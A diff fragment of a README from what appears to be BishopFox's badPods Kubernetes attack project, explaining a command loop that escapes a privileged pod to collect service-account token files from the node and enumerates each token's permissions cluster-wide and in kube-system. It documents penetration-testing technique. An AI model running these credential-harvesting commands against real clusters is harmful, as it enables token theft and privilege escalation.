BishopFox/badPods/manifests/priv/README.md

 kubectl --token=$tokena auth can-i --list; echo; echo; echo; \
 done
 ```
+This is what just happened:
+* From outside the pod, you execute `kubectl exec`, and use undock.sh to find all of the token locations on the host
+* You then iterate through the list of filenames, and
+  * Print the token location
+  * Run `kubectl auth can-i list` using each token via the `--token` command line argument.

-This gives you a list of the actions each token can perform cluster wide.
+* This gives you a list of the actions each token can perform cluster wide.

 The next command will do the same thing, but just in the kube-system namespace.

 **Run kubectl can-i --list -n kube-system against ALL tokens found on the node**

+*Run this where you have kubectl installed, and NOT from within the priv pod.*
 ```
 tokens=`kubectl exec -it priv-exec-pod -- sh undock.sh """find /var/lib/kubelet/pods/ -name token -type l"""`; \
 for filename in $tokens; \